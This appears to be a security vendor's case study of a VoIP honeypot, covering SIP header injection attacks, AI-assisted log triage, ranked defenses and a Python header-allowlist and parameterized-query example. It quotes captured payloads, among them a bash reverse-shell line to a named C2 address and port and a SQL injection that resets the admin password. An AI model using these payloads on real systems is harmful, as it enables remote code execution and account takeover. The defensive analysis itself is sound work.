// case study

VoIP Threat Analysis

One week. Public SIP endpoint. Two injection-in-header attacks.

Attack Surface Discovery

Most organizations audit their web stack, their APIs, their cloud configs. Nobody audits their SIP stack.

We ran a VoIP honeypot against the open internet for one week. In that time, a tool called EagleSIP sent a REGISTER request with a SQL injection payload embedded in the From: header — targeting backends that pass SIP headers directly into database queries. A separate attacker embedded a bash reverse shell in an INVITE From: header, pointing back to a live C2 at 216.126.227.195:3456.

Neither of these would trigger a standard WAF rule. Neither would appear in most SIEM dashboards. Both are real, active attack patterns running against any public SIP endpoint right now.

That's what a targeted attack surface assessment finds. Not theoretical CVEs — actual payloads in the wild, aimed at your stack.

AI-Assisted Threat Analysis

A week of VoIP honeypot traffic produces over 1,000 log lines. Most of it is noise — scanners, probes, malformed packets. Sorting signal from noise manually takes hours and still misses things.

We ran the raw Kamailio logs through an AI analysis pipeline. It surfaced two critical findings a human analyst would likely have dismissed as parse errors: a SQL injection attempt and a bash reverse shell, both injected into SIP From: headers. It also identified a coordinated INVITE flood from a single IP across 10 simultaneous source ports — a toll fraud enumeration pattern — and a deliberate Content-Length: 0 fuzzing campaign probing for parser crashes.

The AI didn't just find the attacks. It grouped them by attacker, mapped their intent (credential theft, RCE, DoS, fraud), and produced a prioritized risk summary — in minutes, not days.

That's the difference between logging everything and actually knowing what's in your logs.

Prioritized Defense Recommendations

Not all threats deserve the same response. After analyzing one week of VoIP honeypot data, here's the actual priority order — and why.

Immediate: Sanitize every SIP header field before it touches your backend. The From:, To:, Contact:, and Via: headers are all injection vectors. One attacker this week embedded bash -i >& /dev/tcp/[C2]:3456 0>&1 in a From: header. Unsanitized, that's remote code execution.

High: Parameterize every query that touches SIP data. We captured UPDATE users SET password='123456789ttt' WHERE username='admin' injected via From: header by EagleSIP — a purpose-built VoIP attack framework.

Medium: Rate-limit INVITE requests per source IP. One host sent 46 malformed INVITEs across 10 parallel ports — the signature of automated toll fraud enumeration. A SIP-aware fail2ban rule stops this cold.

Low: Block Content-Length: 0 on SIP INVITE — it's a known parser fuzzing technique with no legitimate use case.
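
A boundary check covering the Immediate, High and Low items above, written here as an added example (not code from the honeypot, its Kamailio config, or any tremcom tooling): a strict allowlist for the From:, To: and Contact: values that rejects anything outside a conservative subset of the RFC 3261 name-addr grammar, the Content-Length: 0 on INVITE check, and a parameterized lookup showing that a SIP-derived value is bound as data rather than spliced into SQL. The allowlist, the header set it covers and the in-memory users table are assumptions for the demonstration.

```python
import re
import sqlite3

# Assumption: this allowlist is deliberately stricter than the full RFC 3261 grammar
# (unquoted display names, URI parameters other than ;tag= and escapes are rejected),
# the trade-off a boundary sanitizer makes. Via: has a different grammar, not covered.
_USER = r"[A-Za-z0-9._+\-]{1,64}"
_HOST = r"[A-Za-z0-9.\-]{1,253}(?::\d{1,5})?"
_ADDR = rf"<sip:{_USER}@{_HOST}>|sip:{_USER}@{_HOST}"
_DISPLAY = r'(?:"[A-Za-z0-9 ._+\-]{0,64}"\s*)?'
_TAG = r"(?:;tag=[A-Za-z0-9.\-]{1,64})?"
SIP_ADDR_HEADER = re.compile(rf"^{_DISPLAY}(?:{_ADDR}){_TAG}$")

def parse_headers(raw: str) -> dict:
    """Map lower-cased header name -> first value from a raw SIP request."""
    headers = {}
    for line in raw.split("\r\n")[1:]:       # element 0 is the request line
        if not line:                          # blank line ends the header section
            break
        name, _, value = line.partition(":")
        headers.setdefault(name.strip().lower(), value.strip())
    return headers

def header_is_clean(value: str) -> bool:
    return SIP_ADDR_HEADER.fullmatch(value) is not None

def triage(raw: str) -> list:
    # Findings the boundary check raises for one request; an empty list means pass.
    method = raw.split(" ", 1)[0]
    headers = parse_headers(raw)
    findings = []
    for name in ("from", "to", "contact"):
        if name in headers and not header_is_clean(headers[name]):
            findings.append(f"reject: {name} header outside allowlist")
    if method == "INVITE" and headers.get("content-length") == "0":
        findings.append("reject: INVITE with Content-Length: 0")
    return findings

def lookup_user(conn: sqlite3.Connection, username: str):
    # Parameterized: the SIP-derived value is bound as data, never spliced into SQL.
    return conn.execute("SELECT username FROM users WHERE username = ?", (username,)).fetchone()

def demo_parameterized(from_user: str):
    """Return (row_found, stored_admin_password) after looking up a SIP-derived name."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users(username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'original-secret')")  # constructed row
    row = lookup_user(conn, from_user)
    return row is not None, conn.execute("SELECT password FROM users").fetchone()[0]
```

Fed a From: value carrying the captured UPDATE statement, demo_parameterized returns no row and leaves the stored password untouched, which is the whole point of the High recommendation.
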

We deliver this kind of analysis as a one-time assessment or ongoing monitoring. The honeypot stays running. The AI keeps reading it.